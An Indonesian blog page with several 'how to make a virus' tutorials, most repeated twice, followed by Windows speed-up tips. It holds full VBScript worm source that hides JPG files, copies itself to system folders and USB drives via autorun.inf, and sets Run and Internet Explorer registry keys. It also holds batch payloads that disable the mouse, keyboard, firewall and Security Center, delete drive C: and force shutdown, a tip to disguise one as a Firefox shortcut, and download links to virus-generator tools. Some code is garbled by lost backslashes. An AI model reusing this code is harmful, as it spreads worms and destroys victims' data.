// disable keydown ctrl c & v
<script language="javascript">
function onkeydown() {
alert("dilarang copas"); // commentnya
// current pressed key
var pressedKey = String.fromCharCode(event.keyCode).toLowerCase();
if (event.ctrlKey && (pressedKey == "c" ||
pressedKey == "v")) {
// disable key press porcessing
event.returnValue = false;
}
} // onkeydown
</script>
<script language="Javascript">
//Disable klik kanan di mouse kamu
//pesan yang akan ditampilkan bila kamu klik kanan
var message="Maaf Tidak Boleh Copy Paste dengan Click Kanan";
//Kode selanjutnya merupakan fungsi untuk mendisable klik kanannya
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("alert(message);return false")
</SCRIPT>
<script TYPE="text/javascript">
<!--
//Disable select-text script (IE4+, NS6+)
///////////////////////////////////
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
// -->
</SCRIPT>
Kamis, 28 Februari 2013
Cara Membuat Virus Menggunakan Visual Basic
Cara Membuat Virus Menggunakan Visual Basic (VB)
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer
Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\R un\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()
Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “KONYOL”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer
Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\R un\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()
Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “KONYOL”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.
Kumpulan Tool Pembuat Virus
Selamat Malam Semuanya
Ok Kali ini ane Akan Berbagi Beberapa Tool Pembuat Virus
Tapi hati2 Ya Jangan Di buat yang macem2 Xixixi
ok Langsung Saja :
1. Nathan's Image Worm
Download
2. p0ke's WormGen v2.0
Download
3. Vbswg 2 Beta
Download
4 . Virus-O-Matic Virus Maker
Download
5. Kill Switch v1.0
Download
6. TeraBIT Virus Maker v2.8
Download
7 . Hell P2P Worm Generator v1.8
Download
Ok Sekian Dari ane xixixi
Ingt ya Pesan dari ane
Mohon Jangan di gunakan Untuk macam macam Hahahaha
Ok Kali ini ane Akan Berbagi Beberapa Tool Pembuat Virus
Tapi hati2 Ya Jangan Di buat yang macem2 Xixixi
ok Langsung Saja :
1. Nathan's Image Worm
Download
2. p0ke's WormGen v2.0
Download
3. Vbswg 2 Beta
Download
4 . Virus-O-Matic Virus Maker
Download
5. Kill Switch v1.0
Download
6. TeraBIT Virus Maker v2.8
Download
7 . Hell P2P Worm Generator v1.8
Download
Ok Sekian Dari ane xixixi
Ingt ya Pesan dari ane
Mohon Jangan di gunakan Untuk macam macam Hahahaha
Cara Membuat Virus VBS
1. Buka Notepad
2. Copy dan Paste script Berikut:
------------------------------Script------------------------------
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by Zeke Hack"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check 1 then
Wscript.sleep 200000
end if
loop while check1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
---------------------------akhir skript---------------------------
3. Save as, ubah save as type menjadi "all files", simpan dengan format ".vbs", misal Hx.vbs.
Virus ini dapat menggandakan sendiri pada semua Direktori termasuk Flash Disk.
-Virus yang Membuat Ribuan Folder Secara Otomatis
1. Buka Notepad
2. Copy dan Paste script Berikut:
------------------------------Script------------------------------
@echo off
:top
md %random%
goto top
---------------------------akhir script---------------------------
3. Save as, ubah save as type menjadi "all files", simpan dengan format ".bat", misal Hx.bat.
Untuk mengelabui korban buatlah shortcut yang familiar seperti firefox lalu ubah target shortcut menjadi letak file virus tersebut.
-Membuat Virus Berupa Pesan (Messege Box)
1.buka notepad
2masukkan
----------------------------------Script Virus--------------------------------
do
msgbox"komputer anda terkena serangan kami",vbokonly+vbinformation,"hxhacker"
loop
---------------------------------Akhir Script----------------------------------
2. Copy dan Paste script Berikut:
------------------------------Script------------------------------
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by Zeke Hack"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check 1 then
Wscript.sleep 200000
end if
loop while check1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
---------------------------akhir skript---------------------------
3. Save as, ubah save as type menjadi "all files", simpan dengan format ".vbs", misal Hx.vbs.
Virus ini dapat menggandakan sendiri pada semua Direktori termasuk Flash Disk.
-Virus yang Membuat Ribuan Folder Secara Otomatis
1. Buka Notepad
2. Copy dan Paste script Berikut:
------------------------------Script------------------------------
@echo off
:top
md %random%
goto top
---------------------------akhir script---------------------------
3. Save as, ubah save as type menjadi "all files", simpan dengan format ".bat", misal Hx.bat.
Untuk mengelabui korban buatlah shortcut yang familiar seperti firefox lalu ubah target shortcut menjadi letak file virus tersebut.
-Membuat Virus Berupa Pesan (Messege Box)
1.buka notepad
2masukkan
----------------------------------Script Virus--------------------------------
do
msgbox"komputer anda terkena serangan kami",vbokonly+vbinformation,"hxhacker"
loop
---------------------------------Akhir Script----------------------------------
Membuat Virus Sederhana Dengan Notepad
Mungkin ini sedikit berguna buat sobat-sobat yang suka bermain dengan
virus yang memakai ekstensi .bat. ya udah kita mulai praktekan aja
yah... hehehe :D
Script virus berekstensi .bat hanya terdiri dari beberapa kata perintah seperti echo, pause, cls dan beberapa script perintah jika kita ingin bermain diregistri komputer.
ane tidak menyarankan anda untuk menjalankan virus ini dikomputer sendiri ! Virus ini dibuat dengan Notepad dan di save as dengan ekstension .bat Jangan lupa untuk merubah Save as type menjadi All files
BASIC
Invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
Buka URL yg diinginkan
start http://www.google.com
Shutdown kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse setelah Restart
rundll32 mouse,disable
Disable keyboard setelah Restart
rundll32 keyboard,disable
Freezes komputer setelah Restart
rundll32 user,disableoemlayer
Worm
Memperbanyak Diri di Dalam Direktori
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
Me-replace File Batch yang Lain
%0 >>other.bat
Trojan
Mengirim daftar file dalam direktori
dir *.*>>Filelist.txt
Ganti Password Admin
net user administrator PASSWORD HERE
Membuat Info IP
ipconfig >Computer-IP-address.txt
Perusak
Copy ke Autorun
COPY %0 %windir%WINSTART.BAT
Format Drive C
format c: /q /autotest
Delete Windows
DELTREE /Y %windir%
Delete Drive C dengan Paksa
DEL /F /S /Q C:
Mematikan Firewall & Security Center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
Pause
Pause Sampai Tekan Sembarang Tombol
Pause
Pause 20 Detik
@ping.exe 127.0.0.1 -n 20 -w 1000 > nul
Berikut Hasil Akhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.youtube.com
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
[-] Disables mouse & keyboard
[-] Copy ke AUTORUN
[-] urity CenterStop Sec
[-] Display "Anda kena VIRUS!!!" selama 5 detik
[-] Starts http://www.youtube.com
[-] Disable firewall
[-] Delete c: drive
[-] Force shutdown dengan pesan "Ucapkan selamat tinggal pada komputermu!"
Sekian postingan ane tentang Membuat Virus Sederhana dengan Menggunakan Notepad, Semoga tutorial diatas bisa bermnafaat bagi sobat :D
Script virus berekstensi .bat hanya terdiri dari beberapa kata perintah seperti echo, pause, cls dan beberapa script perintah jika kita ingin bermain diregistri komputer.
ane tidak menyarankan anda untuk menjalankan virus ini dikomputer sendiri ! Virus ini dibuat dengan Notepad dan di save as dengan ekstension .bat Jangan lupa untuk merubah Save as type menjadi All files
BASIC
Invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
Buka URL yg diinginkan
start http://www.google.com
Shutdown kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse setelah Restart
rundll32 mouse,disable
Disable keyboard setelah Restart
rundll32 keyboard,disable
Freezes komputer setelah Restart
rundll32 user,disableoemlayer
Worm
Memperbanyak Diri di Dalam Direktori
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
Me-replace File Batch yang Lain
%0 >>other.bat
Trojan
Mengirim daftar file dalam direktori
dir *.*>>Filelist.txt
Ganti Password Admin
net user administrator PASSWORD HERE
Membuat Info IP
ipconfig >Computer-IP-address.txt
Perusak
Copy ke Autorun
COPY %0 %windir%WINSTART.BAT
Format Drive C
format c: /q /autotest
Delete Windows
DELTREE /Y %windir%
Delete Drive C dengan Paksa
DEL /F /S /Q C:
Mematikan Firewall & Security Center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
Pause
Pause Sampai Tekan Sembarang Tombol
Pause
Pause 20 Detik
@ping.exe 127.0.0.1 -n 20 -w 1000 > nul
Berikut Hasil Akhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.youtube.com
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
[-] Disables mouse & keyboard
[-] Copy ke AUTORUN
[-] urity CenterStop Sec
[-] Display "Anda kena VIRUS!!!" selama 5 detik
[-] Starts http://www.youtube.com
[-] Disable firewall
[-] Delete c: drive
[-] Force shutdown dengan pesan "Ucapkan selamat tinggal pada komputermu!"
Sekian postingan ane tentang Membuat Virus Sederhana dengan Menggunakan Notepad, Semoga tutorial diatas bisa bermnafaat bagi sobat :D
Cara Mengatasi Komputer Lemot
Berikut langkah Optimalisasi Windows untuk mempercepat kinerja Komputer :
Tweaking dan Modifikasi diatas bertujuan untuk mengoptimalkan dan mempercepat proses kerja suatu program atau software. Dan untuk mencegah peringatan / warning Virtual memory too low pada saat menjalankan program yag berat seperti Adobe Photoshob, Corel Draw, Adobe Premiere, Pinacle dan program berat lain yang memerlukan Virtual memory yang besar. Dan juga hal ini untuk mendukung Memory Ram yang kecil sehingga masih bisa digunakan untuk menjalankan progam berat tersebut.
Setelah selesai Restart komputer anda maka Kinerja dan Performance Computer anda akan lebih cepat dari sebelumnya. Selamat Mencoba.
NB : jangan lupa restart komp
Quote:A. Matikan beberapa fitur Start Up.
Hal ini akan mempercepat loading Windows pada waktu Booting atau pertama kali kita menghidupkan Komputer.
• Masuk menu RUN >>> Ketikan MSCONFIG >> OK >> Pilih menu Start Up >> Hilangkan semua cawang pada Start up kecuali Program Anti virus
• Klik Menu service >> Hilangkan cawang pada Automatic Updates
• Setelah itu >>> Aplly >>> Ok
Hal ini memerlukan Restart Windows, Setelah itu ada Message Windows dan pilih dont show this message again. Kemudian lanjutkan ke Optimasi pada Registry Windows di bawah ini.
Quote:B. Optimasi Pada Registry
Rubah Registry Windows pada bagian berikut ini.
• MASUK RUN >> Ketik REGEDIT >> >> OK
• MY COMPUTER >>> HKEY_CURRENT_USER >> CONTROL PANEL >> DESKTOP >>
• Cari MENU SHOW DELAY >> Doble Klik dan rubah value data menjadi 10
• Cari HUNG-UP TIME OUT >> Doble Klik rubah value dataya menjadi 5
• MY COMPUTER >> HKEY_LOCAL_MACHINE >> SYSTEM >> CONTROLSET001 >> CONTROL >> WAIT TO KILL SERVICE >> Rubah Valuenya menjadi 500
• MY COMPUTER >> HKEY_LOCAL_MACHINE >> SYSTEM >> CONTROL SET002 >> CONTROL >> WAIT TO KILL SERVICE >> Rubah Valuenya menjadi 500
• MY COMPUTER >> HKEY_LOCAL_MACHINE >> SYSTEM >> CURRENT CONTROL Set> COntrol >> SESION MANAGER >> MEMORY MANAGEMENT >> DISABLE PAGING EXCecutive >> Rubah Value data menjadi 1
Quote:C. Optimalkan Virtual Memory.
• Masuk Control Panel >> System >> Advanced >> Performance Setting >>> Pilih Custom >> Cawang pada : “Use Drop Shadow For Icon labels on the dekstop” dan “Use Visual styles on windows and buttons” dan kemudian aplly.
